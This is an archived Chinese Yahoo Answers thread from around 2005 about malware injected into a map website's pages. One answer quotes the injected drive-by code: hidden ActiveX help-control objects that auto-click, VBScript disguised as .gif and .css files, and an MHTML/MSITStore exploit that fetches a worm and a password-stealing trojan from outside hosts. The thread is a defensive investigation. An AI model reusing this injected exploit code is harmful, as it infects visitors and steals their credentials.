Yahoo Answers is shutting down on May 4th, 2021 (Eastern Time) and the Yahoo Answers website is now in read-only mode. There will be no changes to other Yahoo properties or services, or your Yahoo account. You can find more information about the Yahoo Answers shutdown and how to download your data on this help page.

為什麼首頁有毒

http://www.map.com.tw這個網站的每個網頁都有毒,難道是他們公司自己放的嗎?還是根本不知道?太神奇了!!

Update:

沒有安裝" Kaspersky 卡巴斯基防毒軟體"的人不要輕易嗜試,會中毒!

Update 2:

真的有毒喔,有二隻:

Exploit.VBS.Phel.c

Trojan-PSW.Win32.Gamania.a <~~ 應該是天堂的木馬吧

我試過了,連 Norton 都找不到!目前知道有 Kaspersky 跟賣咖啡可以掃到

Update 3:

Trojan-PSW.Win32.Gamania.a 病毒是卡巴斯基的代碼

是在 bbs003302.css 中發現的,該檔案有 70 多 K

4 Answers

Rating
  • 2 decades ago
    Favorite Answer

    呵呵,有趣的東東.....

    我是沒有查到Trojan-PSW.Win32.Gamania.a這個東東...(我用F-Secure 5.52)

    而Exploit.VBS.Phel.c的部份..

    http://www.map.com.tw/ 有毒..追...

    http://www.map.com.tw/default.asp 也有毒再追..

    http://www.szadk.com/new.htm <==也有毒.此連結被放在default.asp中,左邊的更多商家顯示中的第一個"隨意測字"new.htm代碼

    ====================

    <meta http-equiv="Pragma" contect="no-cache">

    <SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

    <SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

    <HTML>

    <BODY>

    <div style="display:none">

    <OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

    <PARAM name="Command" value="Related Topics, MENU">

    <PARAM name="Window" value="$global_ifl">

    <PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'>

    </OBJECT>

    <OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

    <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">

    <PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://www.twavgirl.com/count/bbs003302.gif///%22/...

    </OBJECT>

    </div>

    <SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

    </BODY>

    </HTML>

    =======================

    進去後是空白的...首頁也沒東西,非常可疑的一個點...

    <PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'>

    兇手應該是這段吧...

    另外發現http://www.twavgirl.com/count/bbs003302.gif 死點..

    http://www.twavgirl.com/ 同樣出現...

    http://www.twavgirl.com/count/count.htm 也有..不過怹是連回

    http://www.szadk.com/new.htm

    再來.. http://www.twavgirl.com/reg/reg.htm 代碼...

    =========================

    <script>var tc_user="szadk";var tc_class="18";</script><script src="http://stat.t2t2.com/stat.js%22%3E%3C/script%3E

    <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.twavgirl.com/reg/msn.txt::/%23%2E%68%74...

    ==========================

    http://www.twavgirl.com/reg/msn.txt 37.1 KB (37,992 位元組)有Net-Worm.Win32.Zorin.a的毒..

    <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.twavgirl.com/reg/msn.txt::/%23%2E%68%74...

    兇手應該是這段...

    歹勢,能力只能暫時玩這些...PO出來給別人參考參考...再研究再研究...待續..

    2005-02-19 13:44:12 補充:

    http://www.szadk.com/bbs003302.css <==檔案頭是MZP 標準執行檔檔頭...UPX加殼,F-SECURE查到的也是Trojan-PSW.Win32.Gamania.a ..不過以目前所查看的,基本上若你更新了WINDOWS到最新的話應該是不至於被植入成功才對...總之,問題應該出在http://www.szadk.com/%E7%B6%B2%E7%AB%99

    PS:http://www.szadk.com/bbs003302.gif 的內容.一堆像加密後的代碼..可以肯定的只是絕不是標準GIF檔

  • Anonymous
    2 decades ago

    是啊!!放網址前要先告知吧= ="

  • 2 decades ago

    沒有毒吧,可能是防毒軟體出問題...我裝兩套防毒軟體都沒有找到阿,而且單獨進網頁不太容易中毒吧...

  • Anonymous
    2 decades ago

    雖然我不知道,但是我要說!若是有毒你要再最前面著名八,如果有人不小心進去咧=  =

Still have questions? Get your answers by asking now.